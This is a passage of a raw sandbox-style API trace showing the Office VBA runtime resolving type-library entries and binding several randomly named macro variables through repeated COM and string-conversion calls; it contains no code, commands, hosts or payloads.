refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.789] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.789] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.789] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.789] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.789] IUnknown:Release (This=0x665ba50) returned 0xd [0069.789] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.790] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.790] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.790] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.790] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.790] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.790] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.790] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.790] IUnknown:Release (This=0x665ba50) returned 0xd [0069.790] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.790] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.790] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.790] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.790] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.790] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.790] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.790] IUnknown:Release (This=0x665ba50) returned 0xd [0069.790] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.790] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.790] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.790] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.790] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.790] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.790] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.790] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.790] IUnknown:Release (This=0x665ba50) returned 0xd [0069.791] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.791] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.791] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.791] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.791] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.791] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.791] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.791] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.791] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.791] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.791] IUnknown:Release (This=0x665ba50) returned 0xd [0069.791] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.791] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.791] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.791] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.791] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.791] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.791] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.791] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.791] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.791] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.791] IUnknown:Release (This=0x665ba50) returned 0xd [0069.791] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.792] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.792] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81f42, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="OX4AAAA") returned 8 [0069.792] ITypeComp:RemoteBind (in: This=0x665ba60, szName="OX4AAAA", lHashVal=0x1091e6, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81f42, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="OX4AAAA") returned 8 [0069.792] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="OX4AAAA", lHashVal=0x1091e6, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81f42, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="OX4AAAA") returned 8 [0069.792] ITypeComp:RemoteBind (in: This=0x665bd30, szName="OX4AAAA", lHashVal=0x1091e6, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.792] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OX4AAAA") returned 0x1091e6 [0069.792] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="OX4AAAA" | out: _Dst="OX4AAAA") returned 0x0 [0069.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="OX4AAAA") returned 8 [0069.792] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.792] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="OX4AAAA", lHashVal=0x1091e6, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.792] IUnknown:Release (This=0x665ba50) returned 0xd [0069.792] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.792] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="OX4AAAA", lHashVal=0x1091e6, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.792] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.792] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.792] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="OX4AAAA", lHashVal=0x1091e6, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.792] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.792] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.792] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="OX4AAAA", lHashVal=0x1091e6, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.792] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81f42, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="OX4AAAA") returned 8 [0069.793] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="OX4AAAA", lHashVal=0x1091e6, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.793] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.793] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b81f42 | out: _Dst=0x67c2d40) returned 0x0 [0069.793] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_OX4AAAA") returned 0x10956a [0069.793] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_OX4AAAA" | out: _Dst="_B_var_OX4AAAA") returned 0x0 [0069.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_OX4AAAA") returned 15 [0069.793] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.793] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_OX4AAAA", lHashVal=0x10956a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.793] IUnknown:Release (This=0x665ba50) returned 0xd [0069.793] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.793] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_OX4AAAA", lHashVal=0x10956a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.793] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.793] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.793] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_OX4AAAA", lHashVal=0x10956a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.793] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.793] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.793] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_OX4AAAA", lHashVal=0x10956a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.793] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.793] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.793] IUnknown:Release (This=0x665ba50) returned 0xd [0069.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa8713fe, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_OX4AAAA") returned 15 [0069.793] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_OX4AAAA", lHashVal=0x10956a, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4f005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4f005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0069.793] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b81f42 | out: _Dst=0x144ec0) returned 0x0 [0069.793] ITypeComp:RemoteBind (in: This=0x665ba60, szName="GXBAA4", lHashVal=0x10c03e, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82036, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="GXBAA4") returned 7 [0069.794] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="GXBAA4", lHashVal=0x10c03e, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82036, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="GXBAA4") returned 7 [0069.794] ITypeComp:RemoteBind (in: This=0x665bd30, szName="GXBAA4", lHashVal=0x10c03e, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.794] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GXBAA4") returned 0x10c03e [0069.794] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="GXBAA4" | out: _Dst="GXBAA4") returned 0x0 [0069.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="GXBAA4") returned 7 [0069.794] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.794] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="GXBAA4", lHashVal=0x10c03e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.794] IUnknown:Release (This=0x665ba50) returned 0xd [0069.794] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.794] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="GXBAA4", lHashVal=0x10c03e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.794] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.794] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.794] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="GXBAA4", lHashVal=0x10c03e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.794] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.794] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.794] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="GXBAA4", lHashVal=0x10c03e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.794] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82036, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="GXBAA4") returned 7 [0069.794] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="GXBAA4", lHashVal=0x10c03e, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.794] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.794] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b82036 | out: _Dst=0x67c2d40) returned 0x0 [0069.795] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_GXBAA4") returned 0x103aa8 [0069.795] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_GXBAA4" | out: _Dst="_B_var_GXBAA4") returned 0x0 [0069.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_GXBAA4") returned 14 [0069.795] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.795] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_GXBAA4", lHashVal=0x103aa8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.795] IUnknown:Release (This=0x665ba50) returned 0xd [0069.795] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.795] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_GXBAA4", lHashVal=0x103aa8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.795] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.795] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.795] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_GXBAA4", lHashVal=0x103aa8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.795] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.795] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.795] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_GXBAA4", lHashVal=0x103aa8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.795] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.795] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.795] IUnknown:Release (This=0x665ba50) returned 0xd [0069.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87142e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_GXBAA4") returned 14 [0069.795] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_GXBAA4", lHashVal=0x103aa8, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x47005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x47005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0069.795] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b82036 | out: _Dst=0x144ec0) returned 0x0 [0069.795] ITypeComp:RemoteBind (in: This=0x665ba60, szName="LXcoUB1", lHashVal=0x10a16a, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8200e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="LXcoUB1") returned 8 [0069.795] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="LXcoUB1", lHashVal=0x10a16a, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8200e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="LXcoUB1") returned 8 [0069.796] ITypeComp:RemoteBind (in: This=0x665bd30, szName="LXcoUB1", lHashVal=0x10a16a, wFlags=0x5, ppTInfo=0x144cf8, 